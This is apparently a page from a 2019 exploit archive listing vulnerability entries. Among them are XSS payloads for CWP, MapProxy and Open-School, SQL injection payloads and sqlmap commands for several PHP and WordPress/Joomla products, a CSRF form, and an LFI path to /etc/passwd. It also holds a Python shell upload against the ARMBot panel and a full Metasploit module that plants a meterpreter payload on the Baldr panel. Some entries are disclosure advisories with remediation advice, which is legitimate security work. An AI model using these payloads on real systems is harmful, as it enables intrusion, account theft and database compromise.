CentOS Control Web Panel 0.9.8.846 Cross Site Scripting


CentOS Control Web Panel (CWP) version 0.9.8.846 suffers from a reflected cross site scripting vulnerability.


MD5 | d316fe6a89738ef2fb11f856478b66bd

# Exploit Title: CWP (CentOS Control Web Panel) Reflected Cross Site Scripting
# Date: 23 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.846
# Tested on: CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
# CVE : CVE-2019-13387

+++++++++++++++++++++++++++++++++
# Description:
+++++++++++++++++++++++++++++++++

CWP version 0.9.8.846 includes a token in every URL to prevent cross site scripting.
However, the application checks only the length of the token, so an attacker who follows the token format can bypass the XSS protection.

See also CVE-2018-18324.

+++++++++++++++++++++++++++++++++
# Steps to Reproduce
+++++++++++++++++++++++++++++++++
Example : https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxx/user1/fileManager2.php?frame=3&fm_current_dir=</script><script>alert(document.cookie)</script>

Parameter Name: fm_current_dir

Attack Pattern for XSS: </script><script>alert(document.cookie)</script>
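The check the advisory describes, as an added Python sketch that is not part of the advisory or of CWP: a length-only token check beside a session-bound, constant-time check. The 16-character token and the `cwp_<token>` path layout are assumptions taken from the example URL.

```python
import hmac
import re
import secrets

# Assumption: the "cwp_xxxxxxxxxxxxxxxx" URL segment carries a 16-character token
TOKEN_LEN = 16
_SEGMENT = re.compile(r"^/cwp_([^/]+)/")


def issue_token() -> str:
    """Issue a fresh per-session token from the OS CSPRNG (16 hex characters)."""
    return secrets.token_hex(TOKEN_LEN // 2)


def token_from_path(path: str):
    """Extract the token from a /cwp_<token>/... request path, or None."""
    m = _SEGMENT.match(path)
    return m.group(1) if m else None


def length_only_check(path: str) -> bool:
    """The weak check: any value of the right length passes, so a forged
    token that merely follows the format is accepted."""
    tok = token_from_path(path)
    return tok is not None and len(tok) == TOKEN_LEN


def session_bound_check(path: str, session_token: str) -> bool:
    """Hardened check: the URL token must equal the token issued to this
    session, compared in constant time to avoid a timing side channel."""
    tok = token_from_path(path)
    if tok is None or len(tok) != len(session_token):
        return False
    return hmac.compare_digest(tok, session_token)
```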

+++++++++++++++++++++++++++++++++
# PoC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13387.md


+++++++++++++++++++++++++++++++++
# Timeline
+++++++++++++++++++++++++++++++++
2019-07-07: Discovered the bug
2019-07-07: Reported to vendor
2019-07-07: Vendor accepted the vulnerability
2019-07-15: The vulnerability has been fixed
2019-07-23: Published

+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak



Active PHP Bookmarks 1.3 SQL Injection


Active PHP Bookmarks version 1.3 suffers from a cookie_auth error-based remote SQL injection vulnerability.


MD5 | 95549322c6d6c54be90a59cfcd3af5fc

Active PHP Bookmarks v1.3 'cookie_auth' Error-Based SQL Injection Vulnerability

This is only for demonstration!

Exploitation: to retrieve the entire database, use sqlmap.


Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.

Use them at your own risk!


Weakness: http://server/path/cookie_auth.php?action=cookie_login

---
Place: POST
Parameter: form_username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: form_username=' AND (SELECT 5293 FROM(SELECT
COUNT(*),CONCAT(0x7176727271,(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE
0 END)),0x716c736971,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ASjU
---


SQLMAP - Automatic SQL Injection Tool 1.3.8


sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.


MD5 | c00763058a3de0d00fe76ec0feaad875


ARMBot Botnet Arbitrary Code Execution


ARMBot Botnet arbitrary code execution exploit.


MD5 | dc95467733aa1cb7550230869a44a164

```python
import requests
from urllib.parse import urlparse

URL = "http://127.0.0.1/ARMBot/upload.php"

r = requests.post(
    URL,
    data={
        "file": "../public_html/lol/../.s.phtml",  # need some trickery for each server ;)
        "data": "PD9waHAgZWNobyAxOyA/Pg==",        # base64 of: <?php echo 1; ?>
        "message": "Bobr Dobr",
    },
    # route through a local intercepting proxy so the request can be inspected
    proxies={"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"},
)
print(r.status_code)
# the original formatted the full upload URL into "http://{}", which produced a
# doubled "http://"; only the host part belongs here
print("shell should be at http://{}/.s.phtml".format(urlparse(URL).netloc))
```

Chrome blink::PresentationAvailabilityState::UpdateAvailability Heap Use-After-Free


Chrome suffers from a heap use-after-free condition in blink::PresentationAvailabilityState::UpdateAvailability.


MD5 | 10b023c0de6d6dc1fd2061aec8927a97


Mandos Encrypted File System Unattended Reboot Utility 1.8.7


The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.


MD5 | 708b91f4a26f055ca2063c2aaee58a6f


WordPress JoomSport 3.3 SQL Injection


WordPress JoomSport plugin version 3.3 suffers from a remote SQL injection vulnerability.


MD5 | 216fb8d11ece3e377a14655d21cf4a62

# Exploit Title: JoomSport 3.3 – for Sports - SQL injection
# Google Dork: intext:powered by JoomSport - sport WordPress plugin
# Date:29/07/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://beardev.com/
# Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management/
# Version: 3.3
# Tested on: Windows and Kali linux
# CVE :2019-14348
# References: https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/

# 1. Technical Description:
# Through the SQL injection vulnerability, a malicious user could inject SQL code
# in order to steal information from the database, modify data in the database,
# or even delete the database or data from it.

# 2. Request: All requests that contain the parameter sid are vulnerable to SQL injection

POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DNT: 1
Connection: close
Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
Upgrade-Insecure-Requests: 1

sid=1&page=1&jscurtab=

# 3. Payload:

Parameter: sid (POST)
Type: boolean-based blind
Title: Or boolean-based blind - WHERE or HAVING clause
Payload: sid=-3506 OR 7339=7339&page=1jscurtab=

# 4. Reference:
# https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/

Opencart 3.0.3.2 Insecure OCMod Generation Pre-Authentication Remote Code Execution


Opencart versions 3.0.3.2 and below insecure OCMod generation pre-authentication remote code execution exploit.


MD5 | 43f9271edd90f1487b6cf770550a3099



Fortinet FortiRecorder 2.7.3 Hardcoded Password


Fortinet FortiRecorder versions 2.7.3 and below have a hardcoded password vulnerability.


MD5 | 908e1ff41b276ecff856055b1a861eeb

Original posting:
https://xor.cat/2019/08/05/fortinet-fortirecorder-hardcoded-password/

Text archive available here:
https://xor.cat/archive/2019/08/05/fortinet-fortirecorder-hardcoded-password.txt

## Background

In June of 2019 I discovered a vulnerability in Fortinet's
FortiRecorder[1] product which impacts the FortiCam devices that are
connected to a FortiRecorder.

The FortiRecorder is a network video recorder product which administers
and manages footage from FortiCam devices connected to it.

Version 2.7.0 GA of the FortiRecorder VM is what was initially used to
discover this vulnerability, however I have since tested all versions
through to v2.7.3, and they are all vulnerable to the same flaw.

I have confirmed that this vulnerability affects the FortiCam FCM-MB40
device, however it is very likely that the majority of other FortiCam
models are also affected.

Fortinet has provided a fix for this issue in FortiRecorder v2.7.4.

CVE-2019-6698[2] has been assigned to refer to this vulnerability.

## CVE-2019-6698 - FortiRecorder Hardcoded Password

### Summary

Fortinet FortiRecorder Hardcoded Password Vulnerability

Product: FortiRecorder - All Models
Version: v2.7.3 and prior versions
Vendor: Fortinet
CVE-ID: CVE-2019-6698
CWE-798: Use of Hard-coded Credentials

The FortiRecorder appliance sets a hardcoded administrative password on
all FortiCams which join it. This password is identical for all
FortiRecorder instances, and for all cameras connected to each
FortiRecorder.

### Details

Upon joining a FortiCam to a FortiRecorder, the FortiRecorder changes
the account passwords for the FortiCam's web administration interface.

The password set by the FortiRecorder for the `fcamOperator`
administrative account is identical across different FortiCams, and
across different FortiRecorder installations.

Because the username and password for the web administration interface
on the FCM-MB40 is stored in cleartext on the filesystem, it is trivial
for an attacker with access to a FCM-MB40 device to read these
credentials, and use them to illegitimately access other FortiCam
devices.

The username and password which are set by the FortiRecorder, and stored
in plaintext on the FCM-MB40's filesystem in `/etc/appWeb/appweb.pass`
appear as follows:

```
$ cat /etc/appWeb/appweb.pass
admin:**************
fcamOperator:12680b17534491
```

This file can only be accessed by gaining access to the filesystem of
the FortiCam device. I describe some methods of gaining FCM-MB40
filesystem access in this post[3].

### Recommended Remediation

* Securely generated random passwords should be created for each new
FortiCam device which joins the FortiRecorder, and all existing
cameras should have their passwords replaced with securely generated
random passwords.
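An added Python illustration of that remediation, not Fortinet's code and not part of the advisory: an audit that flags a password reused across several cameras' `appweb.pass`-style files, and a rotation that issues each device its own CSPRNG-generated password. The file contents and password values below are constructed for the example.

```python
import secrets
import string
from collections import defaultdict

# Constructed sample: appweb.pass-style contents from three cameras. The
# fcamOperator value is shared by two of them, the situation the advisory describes.
SAMPLE_PASS_FILES = {
    "cam-01": "admin:examplepw1\nfcamOperator:0123456789abcd\n",
    "cam-02": "admin:examplepw2\nfcamOperator:0123456789abcd\n",
    "cam-03": "admin:examplepw3\nfcamOperator:fedcba98765432\n",
}

PASSWORD_LEN = 20
ALPHABET = string.ascii_letters + string.digits


def parse_pass_file(text: str) -> dict:
    """Parse 'user:password' lines into {user: password}; blank lines are skipped."""
    creds = {}
    for line in text.splitlines():
        if ":" in line:
            user, pw = line.split(":", 1)
            creds[user.strip()] = pw.strip()
    return creds


def shared_passwords(files: dict) -> dict:
    """Return {(user, password): [device, ...]} for every credential that appears
    on more than one device; an empty dict means no cross-device reuse."""
    seen = defaultdict(list)
    for device, text in files.items():
        for user, pw in parse_pass_file(text).items():
            seen[(user, pw)].append(device)
    return {cred: devices for cred, devices in seen.items() if len(devices) > 1}


def new_operator_password(length: int = PASSWORD_LEN) -> str:
    """Generate a password from the OS CSPRNG (secrets), never from random()."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def rotate_operator_passwords(devices) -> dict:
    """Issue each device its own fresh password; returns {device: password}.
    A collision is astronomically unlikely, but is still checked for."""
    issued = {}
    for device in devices:
        pw = new_operator_password()
        while pw in issued.values():
            pw = new_operator_password()
        issued[device] = pw
    return issued
```

Passwords handed to the cameras should, of course, not be written back to a cleartext file; the rotation here only demonstrates the per-device uniqueness the remediation calls for.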

### Recommendations For Users

If you are using a FortiRecorder device, consider the tips below to harden
your devices and protect your network.

* Keep these devices in a segregated environment with firewall rules
preventing them from communicating with the Internet, or other
networks in your environment, and preventing other devices on your
network from communicating with them. If possible, prevent all
devices except the FortiRecorder from communicating with FortiCam
devices.
* Ensure the FortiRecorder device and its attached cameras are all up
to date.

### Fix Information

Fortinet has provided a patch for this issue in FortiRecorder v2.7.4,
released on August 2nd, 2019.

An account on support.fortinet.com[4] is required to gain access to the
patch.

I have yet to confirm how or whether the patch successfully fixes the
vulnerability.

## Timeline

2019-06-21
* Reached out to Fortinet PSIRT, providing full vulnerability
information including intended date of disclosure 45 days from the
date, 2019-08-05.

2019-06-25 (+4 days)
* Received acknowledgement of receipt from PSIRT.
* PSIRT asked for more information regarding discovery of the
vulnerability.
* I respond with detail describing where I found the plaintext
password.

2019-07-05 (+14 days)
* Received a response from PSIRT stating the issue was already known,
and had been reported by an internal team, and that it is scheduled
to be fixed soon.

2019-07-16 (+25 days)
* Received an email from PSIRT stating that they expect me to wait at
least 90-120 days before publicly disclosing the vulnerability.
* I respond with details describing why the 45 day disclosure was
chosen, and that I will be publicly disclosing details about this
issue on 2019-08-05, the original date which I advised of in the
first email.

2019-07-23 (+32 days)
* Received a response from PSIRT stating that the customer risk created
by this vulnerability is reduced because FortiRecorder is usually
deployed in a closed network environment, though PSIRT still consider
the issue to carry a high severity. This message also stated that
fixing the vulnerability may not be as simple as I envision because
deep consideration and planning would be involved to create an
improved solution. Fortinet repeated their request for a 90-120 day
disclosure period, stating that if I complied, I would be
acknowledged in the PSIRT advisory. PSIRT also asked how I gained
access to the filesystem of the device to find the plaintext password
file.
* I respond stating that I still believe 45 days is a reasonable time
period for a fix to be developed, documented, tested, QA'd and
released. I re-iterate that I will be publicly disclosing details of
the vulnerability on 2019-08-05, 13 days from the response.
* My response also provides a link to [my previous post][3] describing
how I gained access to the FortiCam's filesystem.
* I ask PSIRT whether Fortinet will be assigning a CVE ID for the
issue.

2019-07-25 (+34 days)
* Received a response from PSIRT stating that they will be assigning a
CVE for the issue. PSIRT also ask for a copy of my disclosure
advisory in advance of publication to help coordinate their
disclosure.
* I respond stating that I will provide a full copy of my disclosure to
PSIRT two business days prior to public release.

2019-07-31 (+40 days)
* Received an update stating that a fix for this issue is planned for
release in FortiRecorder v2.7.4.
* I send PSIRT a full copy of my intended disclosure details.
* Fortinet confirm that my disclosure details are acceptable.

2019-08-02 (+42 days)
* Fortinet releases FortiRecorder v2.7.4, which they state fixes the
issue.

2019-08-05 (+45 days)
* This post is published.

## Closure

Thank you for reading.

[1]: https://www.fortinet.com/content/dam/fortinet/assets/data-sheets/FortiRecorder.pdf
[2]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6698
[3]: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
[4]: https://support.fortinet.com/

--
XORcat
PGP Key: 0xA528A62C
https://keybase.io/xorcat

Daily Expense Manager 1.0 Cross Site Request Forgery


Daily Expense Manager version 1.0 suffers from a cross site request forgery vulnerability.


MD5 | aacd6389e460b3f72eeb1843b91f5b1f

# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
<form action="http://expense.adminspoint.com/homeedit.php?delincome=778" method="post">
<input type="submit" value="Click!" />
</form>
</body>
</html>

MapProxy 1.11.0 Cross Site Scripting


MapProxy version 1.11.0 suffers from a cross site scripting vulnerability.


MD5 | 0e07a7d40f1c725cd05b43db084ad338


[waraxe-2019-SA#110] - Reflected XSS in MapProxy 1.11.0
================================================================================

Author: Janek Vind "waraxe"
Date: 07. August 2019
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-110.html

Target description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MapProxy is an open source proxy for geospatial data. It caches, accelerates and
transforms data from existing map services and serves any desktop or web GIS client.

https://mapproxy.org/

Vulnerable version: 1.11.0
Fixed version: 1.11.1

###############################################################################
1. Reflected XSS in demo service
###############################################################################

Reason:
* Insufficient sanitization of user-supplied data
Attack vector:
* User-supplied GET parameter "format"

Testing for Reflected XSS:

https://valid.host/demo/?wmts_layer=valid_layer&format=png"foo'bar&srs=valid_srs

Hostname, "wmts_layer" and "srs" must be valid.
Let's look at the HTML source:

------------------------[ source code start ]----------------------------------

<input type="hidden" name="format" value="png"foo'bar">

------------------------[ source code end ]------------------------------------

We can see that the double quote character from the GET parameter "format" is not sanitized
by MapProxy, which allows us to "break out" of the HTML input element.
Unfortunately for an attacker it's a hidden input element, and this kind of XSS issue
is hard to exploit:

https://portswigger.net/blog/xss-in-hidden-input-fields

But it appears that there is one more injection point:

------------------------[ source code start ]----------------------------------
var layer = new OpenLayers.Layer.WMTS({
name: "valid_layer",
url: '../wmts/valid_layer/{TileMatrixSet}/{TileMatrix}/{TileCol}/{TileRow}.png',
layer: 'valid_layer',
matrixSet: 'GMC',
format: 'png"foo'bar', <--- Injection point
isBaseLayer: true,
style: 'default',
requestEncoding: 'REST'
});
------------------------[ source code end ]------------------------------------

As seen above, MapProxy fails to sanitize single quotes too, and this allows
direct JavaScript injection.

Working XSS PoC:

https://valid.host/demo/?wmts_layer=valid_layer&format=png'-alert('XSS')-'&srs=valid_srs

It's worth mentioning that the XSS payload length is probably limited only by the
maximum URL length; a test with a 1000 byte long payload was successful.
One more thing: the Chrome web browser has built-in XSS countermeasures, but this exploit
works even in Chrome.

And of course it's possible to use more sophisticated XSS payloads:

https://valid.host/mapproxy/demo/?wmts_layer=valid_layer&format=png'-eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))-'&srs=valid_srs
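The two injection points above sit in different output contexts, so they need different encodings. As an added Python example, not MapProxy's code or its fix: the hidden input is rendered with HTML attribute escaping, the OpenLayers snippet with a JSON string literal that also neutralises `</script>`, and an allowlist rejects format values that are not plausible image formats. The three sample values are the ones from the advisory.

```python
import html
import json
import re

# The three "format" values the advisory walks through (constructed copies)
SAMPLES = ["png", 'png"foo\'bar', "png'-alert('XSS')-'"]

# Assumption: a format is a short token such as png, jpeg or image/png
_FORMAT_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9+./-]{0,31}$")


def is_valid_format(value: str) -> bool:
    """Allowlist check: quotes, angle brackets and parentheses never pass."""
    return bool(_FORMAT_RE.match(value))


def hidden_input(format_value: str) -> str:
    """HTML attribute context: escape & < > " and ' so the value cannot close
    the attribute or the element (the first injection point)."""
    return '<input type="hidden" name="format" value="%s">' % html.escape(format_value, quote=True)


def js_string(value: str) -> str:
    """JavaScript string-literal context: emit a JSON string literal, and also
    escape < and > so the output can never contain '</script>' whichever quote
    character the template used (the second injection point)."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_layer_js(layer: str, format_value: str) -> str:
    """The OpenLayers snippet from the advisory with every dynamic value emitted
    as a proper JS literal instead of being dropped into single quotes."""
    return ("var layer = new OpenLayers.Layer.WMTS({ name: %s, layer: %s, format: %s, "
            "requestEncoding: 'REST' });"
            % (js_string(layer), js_string(layer), js_string(format_value)))
```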

Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

12.07.2019 -> First email sent to developers
12.07.2019 -> Got first response from developers
12.07.2019 -> Sending detailed information to developers
06.08.2019 -> Found problems are fixed, new version available
07.08.2019 -> Waraxe advisory released

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/
Personal homepage: http://www.janekvind.com/

Linux show_numa_stats() Use-After-Free

Open-School 3.0 / Community Edition 2.3 Cross Site Scripting


Open-School version 3.0 and Community Edition 2.3 suffer from a cross site scripting vulnerability.


MD5 | 23f5c5d515f9a9df8d34ccc9d370608b

# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0 and Community Edition 2.3 allow XSS via the id parameter of /index.php?r=students/guardians/create.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>

Aptana Jaxer 1.0.3.4547 Local File Inclusion


Aptana Jaxer version 1.0.3.4547 suffers from a local file inclusion vulnerability.


MD5 | 55fce7ea145e2b9332b702002041e57b

# Exploit Title: Aptana Jaxer Remote Local File inclusion
# Date: 8/8/2019
# Exploit Author: Steph Jensen
# Vendor Homepage:
[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/)
# Version: 1.0.3.4547
# Tested on: Linux
# CVE : CVE-2019-14312

Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI.

To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page contains the wikilite demo. After opening the wikilite demo, the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. By using directory traversal in the filename parameter, a remote attacker can access internal files on the server.

PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Baldr Botnet Panel Shell Upload


This Metasploit module exploits the file upload vulnerability of baldr malware panel in order to achieve arbitrary code execution.


MD5 | 778905bbbb01d90fd4b94eba8679d244

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/http'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Baldr Botnet Panel Shell Upload Exploit",
      'Description'    => %q{
        This module exploits the file upload vulnerability of baldr malware panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions' =>
        {
          'SSL'      => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ARCH_PHP],
      'Targets'        =>
        [
          ['Auto',
            {
              'Platform'       => 'PHP',
              'Arch'           => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr <= v2.0',
            {
              'Platform'       => 'PHP',
              'Arch'           => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr v2.2',
            {
              'Platform'       => 'PHP',
              'Arch'           => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr v3.0 & v3.1',
            {
              'Platform'       => 'PHP',
              'Arch'           => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
      ]
    )
  end

  # Fingerprint the panel version from the shape of the gate.php response
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "/gate.php")
    )

    ver = ''

    if res && res.code == 200
      if res.body.include?('~;~')
        targets[3] = targets[0]
        #target = targets[3]
        ver = '>= v3.0'
      elsif res.body.include?(';')
        #target = targets[2]
        targets[2] = targets[0]
        ver = 'v2.2'
      elsif res.body.size < 4
        targets[1] = targets[0]
        #target = targets[1]
        ver = '<= v2.0'
      else
        Exploit::CheckCode::Safe
      end
      print_status("Baldr version: #{ver}")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    name = '.' + Rex::Text.rand_text_alpha(4)
    files =
      [
        {data: payload.encoded, fname: "#{name}.php"}
      ]
    zip = Msf::Util::EXE.to_zip(files)
    hwid = Rex::Text.rand_text_alpha(8).upcase

    if targets[0]
      check
    end

    case target
    when targets[3]
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, "/gate.php")}
      )
      key = res.body.to_s.split('~;~')[0]
      print_good("Key: #{key}")

      data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
      data = xor(data, key)

      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, "/gate.php"),
        'data'   => data.to_s
        }
      )

      if res && res.code == 200
        print_good("Bot successfully registered.")
      else
        print_error("New bot register failed !")
        return false
      end

      data = xor(zip.to_s, key)
      form = Rex::MIME::Message.new
      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"")

      res = send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, "/gate.php"),
        'ctype'  => "multipart/form-data; boundary=#{form.bound}",
        'data'   => form.to_s
      )
      if res && (res.code == 200 || res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end

    when targets[2]
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, "/gate.php")}
      )
      key = res.body.to_s.split(';')[0]
      print_good("Key: #{key}")
      data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
      data << zip.to_s

      # same repeating-key XOR as the v3 branch, via the helper below
      result = xor(data, key)

      res = send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, "/gate.php"),
        'data'   => result.to_s
      )
      if res && (res.code == 200 || res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end
    else
      res = send_request_cgi(
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path, "/gate.php"),
        'data'          => zip.to_s,
        'encode_params' => true,
        'vars_get'      => {
          'hwid'     => hwid,
          'os'       => 'Windows 7 x64',
          'cookie'   => '0',
          'pswd'     => '0',
          'credit'   => '0',
          'wallet'   => '0',
          'file'     => '1',
          'autofill' => '0',
          'version'  => 'v2.0'
        }
      )

      if res && (res.code == 200 || res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end
    end

    send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "/logs/#{hwid}/#{name}.php")}, 3
    )

    print_good("Payload successfully triggered !")
  end

  # Repeating-key XOR with the key handed out by gate.php
  def xor(data, key)
    result = ""
    codepoints = data.each_codepoint.to_a
    codepoints.each_index do |i|
      result += (codepoints[i] ^ key[i % key.size].ord).chr
    end
    return result
  end
end
```


Joomla JS Support Ticket 1.1.5 SQL Injection


Joomla JS Support Ticket component version 1.1.5 suffers from a remote SQL injection vulnerability.


MD5 | b5e65adc52ccb3e8c893020252a27c8f

#Exploit Title: Joomla! component com_jssupportticket - SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 441 in file admin/models/userfields.php

```php
439 function dataForDepandantField( $val , $childfield){
440     $db = $this->getDBO();
441     $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '".$childfield."'"; //!!!
442     $db->setQuery($query);
443     $data = $db->loadObject();
444     $decoded_data = json_decode($data->userfieldparams);
445     $comboOptions = array();
446     $flag = 0;
447     foreach ($decoded_data as $key => $value) {
448         if($key == $val){
449             for ($i=0; $i < count($value) ; $i++) {
450                 if($flag == 0){
451                     $comboOptions[] = array('value' => '', 'text' => JText::_('Select').''.$data->fieldtitle);
452                 }
453                 $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]);
454                 $flag = 1;
455             }
456         }
457     }
458     $jsFunction = '';
459     if ($data->depandant_field != null) {
460         $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);";
461     }
462     $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');
463     return $html;
464 }
```

#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql
